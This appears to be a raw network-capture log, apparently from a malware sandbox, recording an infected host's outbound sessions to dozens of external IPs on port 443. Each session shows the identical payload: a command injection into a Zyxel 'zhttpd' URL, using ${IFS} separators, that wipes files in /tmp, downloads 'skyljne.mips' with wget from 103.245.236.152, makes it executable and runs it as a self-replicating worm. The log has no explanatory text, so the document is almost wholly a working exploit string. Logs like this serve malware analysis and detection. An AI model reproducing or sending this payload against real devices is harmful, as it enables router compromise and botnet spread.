                                            Jan 14, 2024 15:50:54.717597961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8463192.168.2.235647417.63.47.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717649937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8464192.168.2.2355230182.126.58.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717689991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8465192.168.2.2348916171.35.16.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717727900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8466192.168.2.2344122136.165.246.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717772007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8467192.168.2.233722631.87.184.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717830896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8468192.168.2.2346288184.176.243.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717875957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8469192.168.2.233607237.153.200.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717916965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8470192.168.2.2351224217.246.56.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717963934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8471192.168.2.2347342217.234.41.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718008995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8472192.168.2.2334130168.183.66.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718048096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8473192.168.2.2338818213.85.12.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718086958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8474192.168.2.235984438.212.102.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718146086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8475192.168.2.2352462221.201.193.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718177080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8476192.168.2.2358516164.156.18.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718214035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8477192.168.2.235721260.121.252.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718245983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8478192.168.2.235815666.242.48.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718302965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8479192.168.2.2352880148.149.119.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718324900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8480192.168.2.2360490164.146.14.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718430042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8481192.168.2.2340614119.111.56.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718477011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8482192.168.2.235262642.237.14.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718514919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8483192.168.2.2353616192.199.23.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718544006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8484192.168.2.233414486.144.49.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718604088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8485192.168.2.236043031.202.163.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718652964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8486192.168.2.2339298136.124.54.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718696117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8487192.168.2.235858842.38.224.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718729019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8488192.168.2.2357300187.162.16.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718766928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8489192.168.2.233807624.223.79.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718825102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8490192.168.2.2348708216.147.56.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718864918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8491192.168.2.235711294.86.165.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718897104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8492192.168.2.235031031.84.43.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.718956947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8493192.168.2.2340292132.125.44.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719013929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8494192.168.2.235719461.57.163.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719024897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8495192.168.2.2356506167.220.203.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719089031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8496192.168.2.2350110112.199.100.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719132900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8497192.168.2.233612487.245.227.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719155073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8498192.168.2.2346146101.132.84.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719218969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8499192.168.2.235095487.194.153.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719268084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8500192.168.2.2346964111.149.61.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719290972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8501192.168.2.234645078.214.251.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719362974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8502192.168.2.2356412201.143.235.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719382048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8503192.168.2.233834435.19.216.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719420910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8504192.168.2.235751059.48.211.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719482899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8505192.168.2.236012293.46.59.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719535112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8506192.168.2.2347074185.156.137.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719563007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8507192.168.2.2352920110.232.111.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719599962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8508192.168.2.235634220.111.192.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719660997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8509192.168.2.2349682208.238.199.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719690084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8510192.168.2.2358574100.129.69.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719748974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8511192.168.2.2356732217.18.30.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719778061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8512192.168.2.2351702152.120.97.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719810963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8513192.168.2.2333988145.209.149.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719858885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8514192.168.2.2355578125.24.44.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719892025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8515192.168.2.233681693.114.111.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719948053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8516192.168.2.2335370207.204.179.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719965935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8517192.168.2.235423070.83.136.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.719996929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8518192.168.2.236060852.177.215.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720055103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8519192.168.2.234650839.193.72.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720079899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8520192.168.2.234735223.83.140.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720128059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8521192.168.2.2342676101.22.88.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720172882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8522192.168.2.2339508131.248.209.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720227003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8523192.168.2.2337164159.120.134.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720280886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8524192.168.2.2333160222.136.66.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720310926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8525192.168.2.2360024120.250.237.126443
                                            TimestampBytes transferredDirectionData
